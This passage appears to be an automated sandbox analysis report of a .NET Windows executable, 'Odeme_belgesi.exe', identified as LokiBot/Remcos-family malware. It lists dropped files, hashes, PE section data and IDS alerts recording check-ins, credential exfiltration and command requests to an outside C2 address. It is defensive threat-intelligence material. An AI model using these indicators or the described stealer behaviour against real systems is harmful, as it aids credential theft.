	Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	45.89.247.65

Process:	C:\Users\user\Desktop\Odeme_belgesi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	706
Entropy (8bit):	5.349842958726647
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
MD5:	873FA73F7EAAC5A90DC38988855C5032
SHA1:	694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
SHA-256:	501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
SHA-512:	3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\Odeme_belgesi.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\Odeme_belgesi.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.299652759207166
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Odeme_belgesi.exe
File size:	554'496 bytes
MD5:	fc9c0d308e1e66caf355a329f171362a
SHA1:	f88d0427a7fab032dcc647f68facf43fcda1857e
SHA256:	079f962ef81e19092c633fe2e44d5ebb31eb83c0cb5d1052e1a048e15ba549c8
SHA512:	01fcfe9c0a3d90ab703a08609ca2cac512875a12f7eb3f1495451cb2e99bd4d3aa1e2382a36d8e94144bcb83c1fcd8105b1283f202a6c70f258fd2b1b7927c3e
SSDEEP:	12288:GLdf+AksR4vnxuBvV50UKzaiIVJWLllyzD7ejNrkko:g8AksengBv0N2kNrkko
TLSH:	E9C44AF83670A1BDD02BEC3AD8E90C94DF41289F4BE9670141AB097D5D2D497DA2C4EE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..f.................................`... ....@.. ....................................`................................

File Icon


Icon Hash:	0a4ae2e8e8b89241

Static PE Info

General

Entrypoint:	0x48e00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FBAF50 [Tue Oct 1 08:14:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0048E000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5677c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x29928	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8e000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x56000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
pNld"O	0x2000	0x52a50	0x52c00	3f1cb0190f65894fab069fc9e0a370f0	False	1.0003274877265862	data	7.999478956820455	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x56000	0xa648	0xa800	e40263a58ddd540af9b0c69279d1f2d2	False	0.3640020461309524	data	4.520655192638587	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x29928	0x29a00	a4d01d0aac38670a077c40a91bada689	False	0.09138044294294294	data	4.531005903103513	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8c000	0xc	0x200	a40069bf8b25090b384bf1696beeb86c	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x8e000	0x10	0x200	65a7e7a1b501457571bfaddf2142e7ef	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x622b0	0x1194	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9431111111111111
RT_ICON	0x63444	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.029501360463740682
RT_ICON	0x73c6c	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.05749421904561699
RT_ICON	0x7d114	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.07587800369685767
RT_ICON	0x8259c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.06164383561643835
RT_ICON	0x867c4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.11597510373443984
RT_ICON	0x88d6c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.14657598499061913
RT_ICON	0x89e14	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.24795081967213115
RT_ICON	0x8a79c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.32269503546099293
RT_GROUP_ICON	0x8ac04	0x84	data	0.7196969696969697
RT_VERSION	0x8ac88	0x3c8	data	0.40289256198347106
RT_MANIFEST	0x8b050	0x8d3	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.3935369632580788

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T10:54:58.990484+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49797	TCP
2024-10-01T10:54:59.017244+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:54:59.017244+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:54:59.017244+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:54:59.840322+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:55:00.012405+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:00.012405+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:00.012405+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:00.929821+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:01.012878+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.012878+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.012878+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.753408+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.753408+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.758214+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49732	TCP
2024-10-01T10:55:01.929584+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:01.929584+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:01.929584+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:02.666163+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:02.666163+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:02.671005+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49733	TCP
2024-10-01T10:55:02.838931+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:02.838931+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:02.838931+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:03.554360+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:03.554360+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:03.560722+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49734	TCP
2024-10-01T10:55:03.734897+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:03.734897+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:03.734897+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:04.620841+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:04.620841+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:04.625681+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49735	TCP
2024-10-01T10:55:04.791909+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:04.791909+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:04.791909+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:05.540676+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:05.540676+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:05.545578+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49736	TCP
2024-10-01T10:55:05.714856+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:05.714856+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:05.714856+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:06.533521+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:06.533521+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:06.538355+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49737	TCP
2024-10-01T10:55:06.689995+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:06.689995+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:06.689995+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:10.377698+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:10.377698+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:10.382539+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49738	TCP
2024-10-01T10:55:10.539446+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:10.539446+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:10.539446+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:11.258339+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:11.258339+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:11.263234+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49739	TCP
2024-10-01T10:55:11.431407+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:11.431407+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:11.431407+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.104380+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.104380+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.109161+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49740	TCP
2024-10-01T10:55:12.290926+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:12.290926+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:12.290926+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:12.998782+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:12.998782+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:13.003680+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49741	TCP
2024-10-01T10:55:13.156783+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:13.156783+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:13.156783+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:13.904671+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:13.904671+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:13.909463+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49742	TCP
2024-10-01T10:55:14.059014+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:14.059014+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:14.059014+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:14.896174+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:14.896174+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:14.902772+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49744	TCP
2024-10-01T10:55:15.181877+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:15.181877+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:15.181877+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:15.839773+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:15.839773+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:15.845470+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49747	TCP
2024-10-01T10:55:16.001641+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:16.001641+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:16.001641+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:16.898883+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:16.898883+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:16.904506+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49749	TCP
2024-10-01T10:55:17.057243+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:17.057243+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:17.057243+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:20.761788+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:20.761788+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:20.766594+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49752	TCP
2024-10-01T10:55:20.935914+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:20.935914+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:20.935914+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:21.655036+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:21.655036+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:21.659847+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49753	TCP
2024-10-01T10:55:21.808725+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:21.808725+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:21.808725+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:22.549440+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:22.549440+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:22.554283+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49754	TCP
2024-10-01T10:55:22.700322+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:22.700322+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:22.700322+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:23.470660+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:23.470660+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:23.475666+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49755	TCP
2024-10-01T10:55:23.622010+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:23.622010+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:23.622010+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:24.552098+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	45.66.231.242	80	TCP
